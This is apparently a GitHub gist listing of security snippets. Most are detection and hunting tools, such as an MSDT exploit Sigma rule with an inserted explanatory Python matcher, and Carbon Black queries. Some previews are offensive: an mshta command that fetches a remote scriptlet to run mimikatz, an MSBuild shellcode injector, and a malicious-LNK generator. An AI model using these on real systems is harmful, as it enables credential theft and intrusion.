@vector-sec
vector-sec / detection.yml
Created May 31, 2022 — forked from kevthehermit/detection.yml
Office --> MSDT --> RCE
title: Sysmon Office MSDT
id: c95ed569-5da4-48b3-9698-5e429964556c
description: Detects MSDT Exploit Attempts
status: experimental
author: kevthehermit
date: 2022/05/30
references:
- https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
- https://gist.github.com/kevthehermit/5c8d52af388989cfa0ea38feace977f2
logsource:
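The rule above is cut off at `logsource:`, but its intent is stated in the title and the description line (Office --> MSDT --> RCE): a process-creation event whose parent is an Office application and whose image is msdt.exe. The following is an added example, not code from the gist or from kevthehermit: a minimal Sigma-style matcher run over constructed Sysmon Event ID 1 records. The reconstructed `selection` (the list of Office parent images, the `endswith` modifiers) is an assumption about what the truncated rule contains, and the sample events are made up for the demonstration. It goes slightly beyond the page's rule by also handling the `selection and not filter` condition shape, since that is how such a rule is normally tuned once benign troubleshooter launches show up.

```python
"""Minimal Sigma-style matcher over constructed Sysmon Event ID 1 records.

Added example for the "Sysmon Office MSDT" rule; not the gist's own code.
Only the string modifiers and condition forms used below are implemented.
"""

# Assumed reconstruction of the truncated rule's selection: an Office parent
# spawning msdt.exe. The Office image list is an assumption, not from the page.
RULE = {
    "title": "Sysmon Office MSDT",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {
            "ParentImage|endswith": [
                "\\winword.exe", "\\excel.exe", "\\powerpnt.exe", "\\outlook.exe",
            ],
            "Image|endswith": "\\msdt.exe",
        },
        "condition": "selection",
    },
}

# Constructed Sysmon Event ID 1 (process creation) records, not real telemetry.
SAMPLE_EVENTS = [
    {   # Word spawning the diagnostics tool: should fire
        "EventID": 1,
        "Image": "C:\\Windows\\System32\\msdt.exe",
        "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
        "CommandLine": "C:\\Windows\\System32\\msdt.exe ms-msdt:/id PCWDiagnostic",
    },
    {   # A user launching a troubleshooter from the shell: benign, no match
        "EventID": 1,
        "Image": "C:\\Windows\\System32\\msdt.exe",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "CommandLine": "C:\\Windows\\System32\\msdt.exe -id NetworkDiagnosticsWeb",
    },
    {   # Excel spawning cmd.exe: suspicious, but not this rule's pattern
        "EventID": 1,
        "Image": "C:\\Windows\\System32\\cmd.exe",
        "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
        "CommandLine": "cmd.exe /c whoami",
    },
    {   # Outlook spawning msdt.exe with different casing: should still fire
        "EventID": 1,
        "Image": "c:\\windows\\system32\\MSDT.EXE",
        "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE",
        "CommandLine": "msdt.exe ms-msdt:/id PCWDiagnostic",
    },
]


def _match_value(value, modifier, pattern):
    """Sigma string matching is case-insensitive; apply one modifier."""
    v, p = value.lower(), pattern.lower()
    if modifier == "":
        return v == p
    if modifier == "endswith":
        return v.endswith(p)
    if modifier == "startswith":
        return v.startswith(p)
    if modifier == "contains":
        return p in v
    raise ValueError(f"unsupported modifier: {modifier}")


def selection_matches(event, selection):
    """All fields of a selection must match (AND); a list of values is OR."""
    for key, patterns in selection.items():
        field, _, modifier = key.partition("|")
        value = str(event.get(field, ""))
        if isinstance(patterns, str):
            patterns = [patterns]
        if not any(_match_value(value, modifier, p) for p in patterns):
            return False
    return True


def evaluate(rule, events):
    """Return the events matching the rule's condition.

    Supports the two condition shapes most process-creation rules use:
    "selection" and "selection and not filter".
    """
    detection = rule["detection"]
    positive, _, negative = detection["condition"].partition(" and not ")
    hits = []
    for event in events:
        if not selection_matches(event, detection[positive.strip()]):
            continue
        if negative and selection_matches(event, detection[negative.strip()]):
            continue
        hits.append(event)
    return hits


def matching_commandlines(rule=RULE, events=SAMPLE_EVENTS):
    """Command lines of the events the rule matches, for quick triage."""
    return [e["CommandLine"] for e in evaluate(rule, events)]


if __name__ == "__main__":
    for hit in evaluate(RULE, SAMPLE_EVENTS):
        print(f"[{RULE['title']}] {hit['ParentImage']} -> {hit['Image']}")
```

Two of the four constructed events fire (Word and Outlook parents); the explorer.exe launch does not, which is the distinction that keeps this rule quiet on ordinary troubleshooter use. A tuning `filter` selection combined with `selection and not filter` is the usual next step once a legitimate Office add-in turns out to invoke msdt.exe.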
vector-sec / binary_analysis_hunting.py
Created Jul 2, 2021 — forked from rc-abodkins/binary_analysis_hunting.py
This script searches binaries within VMware Carbon Black EDR
import argparse
import os
import configparser
import csv
import sys
from os.path import exists
import requests
# Console output colouring: makes errors and warnings easier to spot in the output
err_Col = '\033[91m'
vector-sec / gist:0f0e23961ed5eddfce60a9559683ea54
### Keybase proof
I hereby claim:
* I am vector-sec on github.
* I am vector_sec (https://keybase.io/vector_sec) on keybase.
* I have a public key whose fingerprint is 45F7 FBFB 85BC 9C5D 26AF FA50 CDD7 1C71 4152 0611
To claim this, I am signing this object:
vector-sec / mimikatz.sct
Created Jan 18, 2018
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
vector-sec / Get-Doppelgangers.ps1
function Get-Doppelgangers
{
<#
.SYNOPSIS
Detects use of NTFS transactions for stealth/evasion, aka 'Process Doppelganging'
Author: Joe Desimone (@dez_)
License: BSD 3-Clause
vector-sec / gist:9caa8e14b2adba7ab0c215a6bf856953
Created Nov 28, 2017
Carbon Black API - PowerShell Example - Find All FileMods By certutil.exe - Type 1 == PE Write.
$APIKey = 'KEY'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$url = "https://www.example.com/api/v1/process?q=process_name:certutil.exe"
$hdrs = @{}
$hdrs.Add("X-Auth-Token",$APIKey)
$response = Invoke-RestMethod -Uri $url -Headers $hdrs
for($i =0; $i -lt $response.total_results; $i++)
{
vector-sec / msbuildQueueAPC.csproj
Created Aug 30, 2017
MSBuild => CSC.exe Shellcode Inject using QueueUserAPC
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- x86 -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj -->
<!-- x64 -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
vector-sec / Get-Token.ps1
Created Aug 10, 2017
PowerShell script to enumerate all Process and Thread tokens.
function Get-Token
{
foreach($proc in (Get-Process))
{
if($proc.Id -ne 0 -and $proc.Id -ne 4)
{
try
{
$hProcess = OpenProcess -ProcessId $proc.Id -DesiredAccess PROCESS_QUERY_LIMITED_INFORMATION
}
vector-sec / Create-LNK.ps1
function Create-LNKPayload{
<#
.SYNOPSIS
Generates a malicious LNK file
.PARAMETER LNKName
Name of the LNK file you want to create.
vector-sec / Get-InjectedThread.ps1
Created May 10, 2017 — forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION